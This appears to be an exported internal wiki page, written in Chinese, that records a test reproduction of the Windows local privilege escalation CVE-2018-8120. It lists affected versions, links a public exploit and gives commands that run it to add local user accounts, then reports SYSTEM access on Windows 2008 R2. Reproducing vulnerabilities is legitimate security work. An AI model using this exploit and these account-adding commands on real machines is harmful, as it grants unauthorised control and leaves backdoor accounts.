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1158873373.432.1723462858602.JavaMail.confluence@ecs-confl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431_1244542889.17234628586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31_1244542889.17234628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CVE-2018-8120 Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6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E6=B4=9E=E5=A4=8D=E7=8E=B0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CVE-2018-8120 Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0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3 id=3D"CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D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C=8F=E6=B4=9E=E5=A4=8D=E7=8E=B0-=E4=B8=80=E3=80=81=E6=BC=8F=E6=B4=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F=8F=E8=BF=B0"&gt;=E4=B8=80=E3=80=81=E6=BC=8F=E6=B4=9E=E6=8F=8F=E8=BF=B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9=83=A8=E5=88=86=E7=89=88=E6=9C=ACWindows=E7=B3=BB=E7=BB=9Fwin32k.sy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B=84=E4=BB=B6=E7=9A=84NtUserSetImeInfoEx()=E7=B3=BB=E7=BB=9F=E6=9C=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A=A1=E5=87=BD=E6=95=B0=E5=86=85=E9=83=A8=E6=9C=AA=E9=AA=8C=E8=AF=81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85=E6=A0=B8=E5=AF=B9=E8=B1=A1=E4=B8=AD=E7=9A=84=E7=A9=BA=E6=8C=87=E9=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8=E5=AF=B9=E8=B1=A1,=E6=99=AE=E9=80=9A=E5=BA=94=E7=94=A8=E7=A8=8B=E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E5=8F=AF=E5=88=A9=E7=94=A8=E8=AF=A5=E7=A9=BA=E6=8C=87=E9=92=88=E6=BC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4=9E=E4=BB=A5=E5=86=85=E6=A0=B8=E6=9D=83=E9=99=90=E6=89=A7=E8=A1=8C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B=E6=84=8F=E4=BB=A3=E7=A0=81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CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-=E4=BA=8C=E3=80=81=E5=BD=B1=E5=93=8D=E7=89=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C=AC"&gt;=E4=BA=8C=E3=80=81=E5=BD=B1=E5=93=8D=E7=89=88=E6=9C=AC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4=BB=A5=E4=B8=8B=E8=BD=AF=E4=BB=B6=E7=89=88=E6=9C=AC=E5=8F=97=E5=88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D=B1=E5=93=8D=EF=BC=9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Win7 x32/x64&lt;br&gt;Win2008 x32/64&lt;br&gt;Win2008R2 x32/6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CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-=E4=B8=89=E3=80=81=E6=8F=90=E6=9D=83=E5=88=A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4=A8"&gt;=E4=B8=89=E3=80=81=E6=8F=90=E6=9D=83=E5=88=A9=E7=94=A8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id=3D"CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-1=E3=80=81=E6=B5=8B=E8=AF=95=E7=8E=AF=E5=A2=83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=E3=80=81=E6=B5=8B=E8=AF=95=E7=8E=AF=E5=A2=83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153" src=3D"9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c545e19fbb3a1d8e71bef8dce2" data-image-src=3D"/download/attachments/14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6/image2022-2-22_16-8-6.png?version=3D1&amp;amp;modificationDate=3D164551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0&amp;amp;api=3Dv2" data-unresolved-comment-count=3D"0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id=3D"145886726" data-linked-resource-version=3D"1" data-linked-resour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"attachment" data-linked-resource-default-alias=3D"image2022-2-22_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-8-6.png" data-base-url=3D"https://confluence.leke.cn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tent-type=3D"image/png" data-linked-resource-container-id=3D"145886706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-linked-resource-container-version=3D"2" width=3D"455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id=3D"CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-2=E3=80=81=E6=9F=A5=E8=AF=A2=E5=BD=93=E5=89=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4=A8=E6=88=B7=E6=9D=83=E9=99=90=EF=BC=8C=E5=8F=AF=E4=BB=A5=E7=9C=8B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8D=E5=88=B0=E4=B8=8D=E6=98=AFsystem=E6=9D=83=E9=99=90=E3=80=82"&gt;2=E3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E6=9F=A5=E8=AF=A2=E5=BD=93=E5=89=8D=E7=94=A8=E6=88=B7=E6=9D=83=E9=99=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8C=E5=8F=AF=E4=BB=A5=E7=9C=8B=E4=B8=8D=E5=88=B0=E4=B8=8D=E6=98=AFsy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=E6=9D=83=E9=99=90=E3=80=82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1dedc65ac298217468f6888ecce3d6c5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45886706/image2022-2-22_15-40-53.png?version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modificationDate=3D1645515655000&amp;amp;api=3Dv2" data-unresolved-com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=3D"0" data-linked-resource-id=3D"145886710" data-linked-resource-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=3D"1" data-linked-resource-type=3D"attachment" data-linked-resource-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-alias=3D"image2022-2-22_15-40-53.png" data-base-url=3D"https://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.leke.cn" data-linked-resource-content-type=3D"image/png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container-id=3D"145886706" data-linked-resource-container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" width=3D"253" height=3D"50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id=3D"CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-3=E3=80=81=E4=B8=8B=E8=BD=BDEXP=E6=96=87=E4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"&gt;3=E3=80=81=E4=B8=8B=E8=BD=BDEXP=E6=96=87=E4=BB=B6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class=3D"external-link" href=3D"https://github.com/unamer/CVE-2018-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" rel=3D"nofollow"&gt;https://github.com/unamer/CVE-2018-8120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=E7=94=A8=E6=B3=95=EF=BC=9A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CVE-2018-8120 exploit by @unamer(https://github.com/una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xp.exe &lt;span class=3D"pl-c1"&gt;command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xp.exe &lt;span class=3D"pl-s"&gt;&lt;span class=3D"pl-pds"&gt;"&lt;/span&gt;net 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admin admin /add&lt;span class=3D"pl-pds"&gt;"&lt;/span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id=3D"CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-4=E3=80=81=E6=8A=8Aexp=E6=94=BE=E8=BF=9B=E5=8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6=89=A7=E8=A1=8C=EF=BC=8C=E6=89=A7=E8=A1=8C=E8=AF=AD=E5=8F=A5=E4=B8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4=E3=80=81=E6=8A=8Aexp=E6=94=BE=E8=BF=9B=E5=8E=BB=E6=89=A7=E8=A1=8C=E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=E6=89=A7=E8=A1=8C=E8=AF=AD=E5=8F=A5=E4=B8=BA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VE-2018-8120.exe "whoami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d28b6d33234ed2f35837bd198e003823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45886706/image2022-2-22_15-43-32.png?version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modificationDate=3D1645515814000&amp;amp;api=3Dv2" data-unresolved-com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=3D"0" data-linked-resource-id=3D"145886712" data-linked-resource-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=3D"1" data-linked-resource-type=3D"attachment" data-linked-resource-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-alias=3D"image2022-2-22_15-43-32.png" data-base-url=3D"https://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.leke.cn" data-linked-resource-content-type=3D"image/png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container-id=3D"145886706" data-linked-resource-container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" width=3D"468" height=3D"7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8F=AF=E4=BB=A5=E7=9C=8B=E5=88=B0=EF=BC=8C=E6=9D=83=E9=99=90=E6=8F=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D=87=E6=88=90=E5=8A=9F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id=3D"CVE-2018-8120Windows=E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=BC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4=9E=E5=A4=8D=E7=8E=B0-5=E3=80=81=E8=BF=9B=E4=B8=80=E6=AD=A5=E6=8F=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D=83=EF=BC=8C=E6=B7=BB=E5=8A=A0=E6=9C=AC=E5=9C=B0=E8=B4=A6=E5=8F=B7"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=80=81=E8=BF=9B=E4=B8=80=E6=AD=A5=E6=8F=90=E6=9D=83=EF=BC=8C=E6=B7=BB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A=A0=E6=9C=AC=E5=9C=B0=E8=B4=A6=E5=8F=B7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112,112,112);"&gt;CVE-2018-8120.exe "net user h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Test@2022 /add"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81afaa41a201dd3e2a0b7736a454896f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45886706/image2022-2-22_15-46-7.png?version=3D1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modificationDate=3D1645515969000&amp;amp;api=3Dv2" data-unresolved-comme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3D"0" data-linked-resource-id=3D"145886716" data-linked-resource-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=3D"1" data-linked-resource-type=3D"attachment" data-linked-resource-d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-alias=3D"image2022-2-22_15-46-7.png" data-base-url=3D"https://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.leke.cn" data-linked-resource-content-type=3D"image/png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container-id=3D"145886706" data-linked-resource-container-versio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 width=3D"468" height=3D"75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win2008 r2 x64 =E6=9C=AC=E5=9C=B0=E6=8F=90=E6=9D=83=E6=88=90=E5=8A=9F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230" src=3D"d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f001a6af6854996cad0e435c02" data-image-src=3D"/download/attachments/14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6/image2022-2-22_15-46-39.png?version=3D1&amp;amp;modificationDate=3D164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000&amp;amp;api=3Dv2" data-unresolved-comment-count=3D"0" data-linked-res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-id=3D"145886718" data-linked-resource-version=3D"1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ype=3D"attachment" data-linked-resource-default-alias=3D"image2022-2-22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46-39.png" data-base-url=3D"https://confluence.leke.cn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content-type=3D"image/png" data-linked-resource-container-id=3D"1458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" data-linked-resource-container-version=3D"2" width=3D"395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31_1244542889.17234628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1afaa41a201dd3e2a0b7736a454896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oAAAABnCAYAAACQE/MwAAAeuklEQVR4Ae2c3Y4syXGD99WsR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86RsDfp01QsAncanIv6qanp5pChgwg2REZlezz2Qf7e4f//e///Nn/a+wfv7+n3//82//8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jj/zkGXxbBv77v/77T/1JHvN5TAaSgWQgGUgGHsxALoAPPsxcGL/twpg/FJLjZCAZSAaS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5AB48rFzwcsFLBpKBZCAZSAaSgd+QgVwAcwHMN6ZkIBlIBpKBZCAZ+LAM5AL4YW/4b/jW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JQDKQDCQDycC9DOQCmAtgvvUlA8lAMpAMJAPJwIdlYHUB1H8Ts9ZPBYS5zPMa/l2R8159J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F57Ne9ZzozCw86XvSyxlmM/GAeHdrfIrMWKH21Nr9rnee6pnxOsPnr2rtHe1xZ3+fP9tj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/e3sNH/z3X5o8qzvvuc7o5qz0O++Lz6a+M/O0lz0VdYbytVat1q67x/VVv+uvqvWc3Z4jH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GmcXQH9gXq8eXPlHHp/l9ajvlfzs/HWOu2d+on/2PHS+rmc9J9rOzPKczDz1zs7gmta6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7Z/R5q3q2X/X6njvzvEfr3X73McP5VV197mHWu6Kf1+snzl0zn5jzjjOeel6rOSv9yrPh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jXpGM3VfepXTdemr2j0r/0rnTKdYc097/Oxdv5+36+k83ayP4kYXwO5hzbjS/MF1fjyue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1ppW+OvtX9/t8r1fnW+mreSt9NX9X7/ZZca57XXt33NUz+axRXbzu7T72d95rfCN0/6h2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lY8a74+o13T2/z7877936n3p9qzkr/c5z+a7Z3b7K6bpe325dvhM/z87nw5/gnRmr3k53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9a78kFsHsIPNTCme4affBeFw8H4gXhQXjv1XrkqRmqse5md5r7qB3pLUTzdVefcOXt/Lqf6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3fze7mwEHMkf7dV0+9ejaZ3itXp0J3/mdqxr/KXazmIcG6uyOKx2+UGvtna13+/HNZnX7a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HT8I3+3XcfSB2r+7rl68vmYuiA+EB+EL4RzVM1vTh8frbg+8ID0gvPdqrZ7VWufqmj44E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f6HN36lkvGujz4EHV4RzxwFfNGsSj6JrWrEHtYz3TyrPSmTPCrh8O9F54RfUoz1r1WhcPp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7F8CdB9i9Oc49Xde5dCbrQte6Wl8XvcppTzcTjp5uBhxeap1N/4g74WfzVetmuu6elV5+/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/q3We69089bvutc5DK2SGcr7GA6JTFypXa+fwqg8ORAPhC+E6xOcavCIe5XzdeZSrdfUo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Ps/1Ve37ndar+Svdz//q/U/Ph79w96zeQ929dtV8/kzrZnXcaobvST3qc/607s7Inq4xG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UW+uRb8Z3s+BOUM8y6nPP3Xq0T/i//h7+4xUXwHrop29o16NvHvMcR55uHr3aM1p3Xue8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fd+dn/kjTGe5Bc1zN7HRmqOb7rbRuhnNe60zXvFZvd7bO71zVPmdV+wz88GB3phHnPDMKm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16++buZIhwd1n26Oc/Q5znyqeR+1eu6sfd6ohgd1z45Tfbb2Xq+rt+OYieaIrv3l0Vo9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N2hGvIh7ldN3pznmt/bP1qA/eUWehKafrma4aa3BnBl6wenTNjI5DG/WovlrP5qMpMg/u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89hcxRxdAf1Pq4cIVrh42Xu2jRzU4sNM6Dj+44ynvVZ/3rWrOBc78qtV655za0/lV1zXn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umdNxI63zOuf1aFbxnVc5Xe/42esEfQ/tRSuEh6Mu7LiOH/l0lq7d7zXeEd+dgR7Vqh9+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p/vo/sx7GtmXuasan6L3qLZae6/X2t9pHac9td7xeI/W3q+1rrWnW6+8ne6c190+HTfqG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P/OgFXImuFEND7offhdn/a49Xe+e8eN9o78BrAezelPUU96dh8lMkJ6naz0beyiu9lOv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RWtf0F8fa/au6m6ezWKtvtF7ttaPveO7svzO/8xTHj+7fedFB+sCOLw59ht67qmuWe0Zcx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H72iu86u6O7Ny1c+eysP5fPe4vqqZexVX81f66vyrc63m39X9fKvzdPrsDDPNZ7l3R/cer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1OX9a137ao2vXurOt/K77TNdP6+5Myvk81fwsX1H7fqn/9XvxL89idgHUN2b1hv5lqPwS7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PUGfBQ+qDgeqxhoNhF8hfhC/1qwd3Vu6c13NHLQZ4nX0nju69jIXjroQrlB513Z09zDb5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zzDi6VN0b1erX9fqVZ41OrUjeuFMU99oPet3jZpZ1I7oha5Vrbp7Zpr3Mlt7nKMG1Xt3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YLcnWmGnzzjvpaaHGoQH4UH4QjhQtZ01fYX44bx2fqS7j9px1A+/i6O59N/Va47OYC6o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0QnoU0ZXT9a6Ob4Q1c6TB+77UT+nMCQ4uf3VPW10A8/AmD29x0c2zu/fs/A+EPM97zzPPL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koFk4J8ZyAUwYfhnGN7oQsvlD3zHM+ZM+ewkA8lAMpAM/NgM5AKY8P7Y8L7RhTXPMJ+j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gR+VgVwAE9gfFdhc+pb/bE3ez3ymk4FkIBlIBpYZyAUwIVmGJJeuXLqSgWQgGUgGkoHf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zAUwGUgGkoFkIBlIBj4sA7kAftgbnm9wv+sbXN7PvJ/JQDKQDCQDVzKwugDyb2GCfEPY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2lNr97veeapnxusMn7+qtXe0x539ff5sj9VZv0L3813dgzlX+2d9zAbxUhfC/SR8xfl1D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H9N+CvL7u9aCBnWfE0VM48tzldY/TfbR35xz48VKf7kv/JyHP6uQ103P1+d7tPznrd3n1N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9en6d8RX7M//q+f7RN7sA+gZa67oGeT3jdg7s81b1bL/q9T135nmP1rv97mOG86u6+tzDr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9Zd29fX53FV9dZ/v6vPX8+Q5utnK1br267gnz/Gds3ht4OgsK/3pvtG8Ef/V5xvNH/F6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V7v6vrlfnWend+apn1Dfia86sr9vHubv9Pu8V9ex5jPa/+jqv9vk5rs7Z6dvx+Hn+Uo8ug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dA70ecX/ZfPJXlj5vty6f7u197O+81/hG6P5R7TzznN+ty8eMd0E/+1PnujO363XO66fO/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+bvYu96rX/5X7+Gv1Wveeaerz9dU+n7Oqr+6z0zfzzLQ681199bp3dM5QuPLjHflW+qhv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XPi7/cx5FV4976v7/Hl89f5X5//jnCcXQH1hvqnX5XWuap1xsu5mMQ8N1Lkdp2fzGdo7W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vNkvPg0/7WIN4VogfVP+KU511oc5gjU4NwoPwIDwIXwjnqJ7Zmr5dT+eHA3UWnKLqtXaNG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L9ClqLzyc1/Adqpc1qP6OQ0cD4QuVY13YedBV0xlXdZ+ntc/0eubVs+m6Zoz6uvlwoPae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hFdUD7xyulZd1+WhdqTfeWrXfRa689WvGmvmjnT3UTsyR3k4ZlPjoQbhC+EcO4/60ekb1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Dmpf1zvTXaMe7dvpcOCV3uqhv1BnwKun09WnOuuRDg/iB+EV0RzxOL+sX3EB5HCFHEg5X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Llau1c3jVBweigfCFcB3icw1eEY9yvu48ytW6epTzGV6712uft9Ldr/vd6T2dq/vO1t2Z3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qOXmU/XzJ3h3T13Z7MPqH0dV7rzXq887n+61tfQrVf7aY970Zwf1cVXj+vMWWnq69azu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rmlkg/sLiqF2ndnT/Sle/rqvPa581q1e9ne6c17rfSBvx9KIXFkft667uOO0vffbj3jt19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Da8484w050d18bPz3dF4Db53N7PzzPrRpviKCyAH4EFS7+DoRcODNUvXzO449+IppG+F9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93cyRDg/qPt0c5+hznPlGGjyzqMGOd85regtH2ojX3tF6p9c9oxq+kP3g7tbMAZm3g95zW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sQe3ruNKd93rH0/WwN5qj69Sn6HOpuzkjzfmrNX2F3f4rjn73wSuqBx5uVeMDV37X6QNP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XM0Y6c57rWcYaSOeXte11nX5ve64zsNejiuv67O6tO48I46zMFMRTRFduVo7f7Wmr9D3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s0bq+zoN/puFp8eQCqJvoujvsiGsPMfi24XtoL1ohPBx1Ycd1/Mins3Ttfq/xjvjuDPSoV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4wF0vPt1nNAMvOtjxznlNb+FIG/HaO1p3vc7N6pnWnfmuf/Q6ZvxX7umzR+cY+Zz3eucZ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w60HbQe/3WmeMNOdP6pVX91+tfVb5nfP6qkfP4jNXtfZ2+690n49/xOse5cEPzvq0F7+i9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Nesrjuta67rwd5z2co8OV1/VZXdrpeWbz/LzuRXf+pF552aN7XR3n83Y9na+47Z/RBbAb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ji/OfV3tvau6O++I63if351JOfd7jXeXd5/X3ZnZo0Pv99rnrXT36553enfndnvoGbq19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Ra2CGIueEG9XwM9yZgQeczVNt1z/yOe917eWc1rpeea/o+lq79Wp/7XEvmvMn9crLHjvos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3PZ2PM/nMWe2az13pK3/Xrz2lc27lldP1aF7nwet74EWnBpXXdacXpx5du7bT756aB9fNW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tHl3rvqxd9xpfd1Y07zmpV172GO2/03/Fo/turWcXQD28H4bhKx5dkd4Zql/X2qM8a3Rq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0XrW7xo1s6gd0Qtdq1r11dr71Y824/Aodn7Va41nxI90/OiFcDpX9dVa+3WG8syA85o+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ZAXY6HIh3B7WHdeGoF89I73h6FNWnfK1Vq/Wp7jNO+0/3d7/W7A3ndfFwjt6jeqc553X1F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d6RPeZ+Ppnxx9Dqqf9TjnpFPZ9PT7a0a61Fv169eX6/8K72b5z1Vdz/aq/qKx4uPurA4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qW2mnup6F/ZTr5uED8eOl7nQ0vOVRjnXX65zXzJzNQMPr+2s9Wmuve6q+9LO6AF4aevUw6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RcyO0ycD5h8ufndevfKbfuffsdX7nudh7hLNz72rM3vWf+Jg9wpNZP9XLa3/H8/vZvH7H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/PHnH7kAnv9y/4QPCh8O8BNe89OvkWcHPj1/No89wZn3OzTOBX7HGb5yT14X+JV7feJs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As4HveMZPPRPvCfipzyEXwC/627OPDVSe51v9LW5ymC94yUAykAwkA20G8jeACUYbjFzk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ZCAZSAZ+bwZyAcwFMBfAZCAZSAaSgWQgGfiwDOQC+GFveL7N/d5vc3lv894mA8lAMpAM7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cAPOtLxlIBpKBZCAZSAY+LAOrCyD/lgx4GhD6wN1+/I67/Sc+9jjpiffDPii736h+iI/MF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o5qz0q/tWn8+mvjPztJc9FXWG8rVWrdauu8f1Vb/rr6r1nN2eK73reQWn56q17okG53Xx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dYfa381ULuv8HrqVgd0L4K1N5MOyO6c+GOXlA8J6t//Ep3uc9D3h5XU+Mesnznj31//u5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+9WclX7lNfC+6Gy4K/NGPaOZui+9yum69FXtnpV/pXOmU6y5pz1+9q7fz9t5Xsn5eb6i9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3xA+qztpnvPKZZa9feNl84gJIOGcB2fF0/Vf7ulnvxv3m17bzrN/99b/7+Xae8czz1Otb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tO+a3e2rnK7rNezW5Tvx83x8PvwJ3pmx6l3pJ+d8wuvnebrmjD4XvnBHw6OoM7L+hZeyV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1AugfCGr9QDg3qp3XDydaoc52j9bu62qdq2v1Kt/tr95uPetH0z7nqEH11hoeVN25UQ0Pd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dmh5F96lWa9Vdo1bPbO1+r6sXDvR58KDqcIU6Sz2rNTNG/ejgaN5VnT5wNH/Gz3rRQJ8DD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HvmrWIB5F17RmDWof65lWnpXOnBF2/XCg98Irqkd51qqv1vSA7ocHXZ/Vqx7XV/VoL+9T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1iCeYy9/tDNy5AHbh1BDr4fAqt7Oe9anGupC5cKN6xq96VzqzZ+gz1Oua1+rt1u73unqU0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3M4vjZ3UefCNc9a/0muue0V4d771P134+5hd25+k476H22V2t87RPedad7pzX9K5w1Of8a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eRTXWoPpGc9Rb65FvxrOPzoI7wZ1+99ytT85X3tP9duYzs7Dzq955VO/6u3OrT/tZo2td6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/+h2SZ7HxLO5cAHnAGlY4xx2P91Q960Mr7LzozPV6xrv3tGb2DH2mel3zWr3dGr+je1VX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dnTd6/J3HHPQHNFXSB++UQ0P4i/sONVna+/1ejUfv6Puqdpqnvaxpr+r0RzxKuJRTted7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bj/rgHXUWmnK6numqsQZ3ZuAFq0fXzOg4tFGP6qv1bD6aIvPgrtb0zZA9FNUPr9yV9WzO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K+9s5mwWfcGNS4/8RcPHP6/fcAEcvYn+gfGavo537rRm9gx9pnpd81q93XrXj69Q58Ar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3HHvMNDwz9P5V3c3yns4z4rzXa+3rtI7TnlrveLxHa+/XWtfa061X3k53zutun44b9Y34p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50Ao5E9yohgfdD7+Ls37Xnq5XZ1ztp/3uVW209h6v6dvld33MLRz1jLSZX+dmnUvgdgae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vLO+mcaZ8IDwip3mnNfVD6eoc1dr+nQWPap1Or4R7vSrR9fdfk/rvsfp/NHrhj+d5/7V+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v6drPNzrHjJ+daab5TPfu6N7jtc8Y1aM+50/r2k97dO1ad7aV33Wf6fpp3Z1JOZ+nmp/lK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/32nt87xezcPvvhG/66O/sOspbqahM4cZzj+lMyf4Sy+VuxdAgnYaBPrAk356QO2FA1Xr1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64ZjlNTy40vE50lc40zrd/V7rbO9H0x7nqEH11hoenOnqVx+9hcqrH4/rs9p7vN6dT1/h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qvNQgPAgPwhfCgartrOkrxA/ntfMj3X3UjqN++F0czaX/rl5zdAZzQdVYz7TyoBfSo4iun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rJkjDd73pX5KZ84I2Y+zUuOnBuF3kT7Q++DBJ3Vmdlj7wOueM6409bKm56rOnOCHXgB/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J1+IzvX5yr8z6pR++/LMo7S+t5D15TwaSgWTgBRlY/Q3gT30TuJCBX/E6mA1+xR6Z+YIP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A8lAMpAMfFoGfusFMBenXJySgWQgGUgGkoFkIBkYZCAXwMGD+bRvAnm9+fabDCQDyUAyk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AcwFMN+OkoFkIBlIBpKBZODDMpAL4Ie94fl29znf7vJe571OBpKBZCAZGGUgF8BcAPOt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ZCAZSAY+LAOrCyD/hit4GhD6wN1+/I67/fG9T5D1PfyK94X5J7PpKTzpu+Jlr1Ev+tWz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3T2ud+fH02nh3uczmPci70UykAz8WwZ2L4D/1jj6K8UBf+UXhfd4ffdM6V9/IOqZP/Gcv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enX/W98RrZsbOPjse5imO+pxf1TVTPbp2jf3xgPDB9ecqzyjPKBlIBr49A09cAHd+Aex4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uT/3sB+rJ5/3krN33ebXnSt/d5wnf6Vnwg6szuG9UF1+zRrrugwdULetnP4t5nnmeyUAy8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kF86hfVQqPUBwYGqac936X4erzkXqDpcob6WkQffrq7zdb3br2ca9essX9OjvHPUYOdF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Xl+rn3Wh+pR3TfdUn/bvrOlded2nNWvQz6a17oMfVC3r/LJKBpKBZODNM3DnAsgf/I7dm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cPYrqhS+OdaHW+NHfpeYcI1ydt/rUw7rQta72felXvuPQXTutmTNCn1e+jrvCsyfzCmdz8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1jHev1/SucNWHXqiz4ItDUw4eDo/OUI/zqd/8D/7BP6qT9y3vWzLwQRm4cwEkKPySoO5wx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0wuql9vVOPdqbmaD6Ou5EV6+vV7PLj6dQa12rBx97uTbS8St2vdqPTo/X8CNUP3OV075T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fCN3vNX0d75zX9K5wt8991GDts1qX7ufRHtdSf9Avklwo/+2zkfwn/2+fgd9wAewesv9i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ua73yrnSdxXqnZ+aZabWH6153Hs620jq9m6/zfK3+Wncz6VEv3MyPx/u8xjdC93tNX8c75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tcx91IXvAVa3rrqYnmF9yyUAykAz80Aw8cQHcefP9F8oTPbOZrr1bvXr9q/NWv3t0pmunt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59ayjtc7QtftHmvK6pt85r/GN0P1e09fxznlN7wpHfc6v6tpHPbp2Tc/kPtWy/qG/FPK3e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J8O/OgO7F8Crf9DTB+4+TPyg98GDrleNBroHHny17vt5zblA1eFA1VijgfAgfGFx1OjK4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6YzZWs+ja3rgHNELVVvxeNU3W+NXVL/yusbjHDX6DPE6as9MK5/rVZ/06wztyzq/NJOB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ZWF0A8yb+gDcx39j/cnF5VWa5QL1qv+yTz2IykAwkA8nAYxnIBTBheixMH3QR5fIH5hnm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QDLwozKQC2AC+6MC+0GXzLwv+WwmA8lAMpAMfFkGrlwA/Z8VOj3c3X72Yw4Iv4tX+q70j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C58/AJKBZCAZSAaSgWTg0Qz8hgtgPZArl6grPVf36t403V/XnTdcPvjJQDKQDCQDyUAy8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AXFTA04PQB572q//ujFV/6Vd+9Iyz9Wr/WW+0/CGQDCQDyUAykAwkA5czcHIB9AuL16tDu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z81Z9bDPqv9VzpzFL1ndo6RpvOyzoc7GUgGkoFkIBlIBh7PwO4F0C82HGTEo4P4QOepH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b+apv9EPf7mz8hV1Px9Ez0/AE86FPBpKBZCAZSAaSgcczsLoA1iWFiwprxToQ9ehw9KOv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Pkc1XY98znvNjOJXP3gdRzPLN9N8Tup8+JOBZCAZSAaSgWTgsQyMLoBceE426nq6S84uV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kmtcj34gf9eO/grOZrnl9Zb/05A+HZCAZSAaSgWQgGVhmYHQBXDYu/ntsdZk5vdB0PXCKn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yjfhRP/4rqOdmzRzfz2t8wXyQk4FkIBlIBpKBZODRDKwugFxaFOsAWrMeHQx9hrNe1WoG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kG/HeX/XpD7PBbuaOhieYD3wykAwkA8lAMpAMPJ6BnQugbsqFBkTzGn4HZ72ujWrndd9O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Z6q+1e0a18z4ndT78yUAykAwkA8lAMvBYBr77Ari6+Lg+qp3XB9Rpu9xsTjdD/bV2z6h2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m3X+cEgGkoFkIBlIBpKBZQZeeQH0S4zX3WHd43X1KKdr5hWnP96jPtYd+myvr/boHF3XP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VLh/4ZCAZSAaSgWQgGdjKwM4FsC4e+lODuYw4rja966effapWjjU8iF/PrtyMH2nsxRyvt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ldK39vqY/mA96MpAMJAPJQDKQDBxnYOcCqEO5oICl6Vq9o/Wu332zGg2cnUs9esYRP5rl/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q+PVk3U+/MlAMpAMJAPJQDKwnYHVBXA06O6FZKd/5um04jpeX4Pr1KB6WY8051c18wrdC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1PtzJQDKQDCQDyUAycDsD73oBnF2EntZG84ofaTx4PKDyrB1nM2eaz0mdPwCSgWQgGUgG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rl4AL222+I9HZ2ZCnAwkA8lAMpAMJAPJwAsykAvgCx5yLr7//I9350OdvCUDyUAykAwkA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3+BNyAUxF8RkIBlIBpKBZCAZeGUGcgHMBTDfxJKBZCAZSAaSgWTgwzKQC+CHveGv/HaR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BpKBZCAZeM8M5AKYC2C+9SUDyUAykAwkA8nAh2UgF8APe8PzTew9v4nlfcn7kgwkA8lA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mAtgvvUlA8lAMpAMJAPJwIdlIBfAD3vDX/ntInvl22wykAwkA8lAMvCeGcgFMBfAfOtL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SAaSgQ/LQC6AH/aG55vYe34Ty/uS9yUZSAaSgWTglRnIBTAXwHzrSwaSgWQgGUgGkoEPy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2hr/y20X2yrfZZCAZSAaSgWTgPTOQC2AugPnWlwwkA8lAMpAMJAMfloFcAD/sDc83sff8J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LMpAMJAPJwCszkAtgLoD51pcMJAPJQDKQDCQDH5aBXAA/7A1/5beL7JVvs8lAMpAMJAPJ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XADzrS8ZSAaSgWQgGUgGPiwDuQB+2Bueb2Lv+U0s70vel2QgGUgGkoFXZiAXwFwA860v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IBlIBj4sA7kAftgb/spvF9kr32aTgWQgGUgGkoG3zMD/A8ue+oe1k994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31_1244542889.17234628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28b6d33234ed2f35837bd198e003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noAAABqCAYAAAAr4/y+AAAdRElEQVR4Ae2bv85t2VHEr+TA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L1kxgjeSRbMmT4ucA3gQC5GdAckZueAQiJAsISJBIgEeAF3Dwob7M77qmptefff6f81VwV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W3rvOOWt/Hn94e3t7+49//7eP/37zN795+/Wf/frtw4cP+Zd7EA/EA/FAPBAPxAPxwLN7I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sI8H4oF4IB6IB+KBF/VADnov+mCf/Q0k+89bdDwQD8QD8UA8cL4HctDLQS9vcfFAPBAP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oh7IQe9FH2zegs5/C8o9zD2MB+KBeCAeeHYP5KCXg17e4uKBeCAeiAfigXjgRT2Qg96L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/vMWHQ/EA/FAPBAPnO+B2UHv9//0+zf9d6nTPjOZ5zn8oyL7LTxlj+f2r9bU+cSrniN1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klj3MZqIB0e7m6BSZsULtqdj1Xu801TPjdYbPX+XaO1rjnPV9/myN1V7vUWf/rO05fIdoH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v03nPXZ88fxCIB57YA6ODnn/wPV899NKPND7L81HfLfnZ/msf5+75Ev2z+6HzNZ71HKnt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tbM9eE1zjWtNz2fczh593iqfrVe9vubOPO/RfLffdcxwfpVXn2uY9ajo+/V8te+j+tW8U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+anrpe+JDwP5y9n3vmtfxs/dQa/70M+4qvkN6fRovOY5unviak+r+mrv1+73+Z6v9req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5u/VunRXndc9r7Y47dU8+a5QXr2u7jvWd9xzdCF0/yp1nnvO7eemY8ei4uqbV/r1/pb913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3k/VyQIwHruiB3YNe9xD4ciic1b1GH7znxcOBaEF4EN57NR9paobWiLvZXc115I70FlLz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9Lqe1p33/lXd9d3sbgYcyBzt17h0qtHYZ3iuWp0J3+mdqxz9UexmMY8aqLM7rurwhZpr7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3m9Wtr33E4GoWdfQgfLdex9EHav9uXL1oPdZ8tn5XU260P3iQfXS9OxrtJ66+LoYLXvGHN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9+OwGPjvnoLfzgGZfQvS75ty85uoM4kKvdTn7mtVmM1mHOWjJdS5a1WhMT8fpHHSg6zXX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673OnkDXe971dxrmuf6I1nuZyQzFWQ0dGrDjlau4tMrNer0266OmuNPvGvIOma015Squ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Xeu7zvL7KuzWPcD7f96N5aTX3uMuL03++nubd/Fmv1hJ/9z7nfuR+vKwHrn3QqxunX0w7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8x5Gmm0ev9oziTuuc58za5VXncbd/5o9qOsM11BxXM7s6M7Tm661q3QznPNeZXvNctd3e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Ve4z0MOD3Z5GnPPMKGT+CunRWV2/6rqZozo8qOt0c5yjz3Gm05r3kavmnFjnVVyzlFvlK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drRGDqiluxlMP5nATD7wDD+we9PjCUVPAdV8wqqsYrcddrr3aB99x1MAdTWlP1XnfKmdf4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39qk9nV7rGrOfEY60ymvMnI4b1Tqtc56PZhXfaZXTeEfPWkfQ19BeaoXwcOSFHdfxI53O0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8d0e6NFa9cPPZqEBd7XodB1dn3mXRtZlLVD3oRqvz2quXeWs6T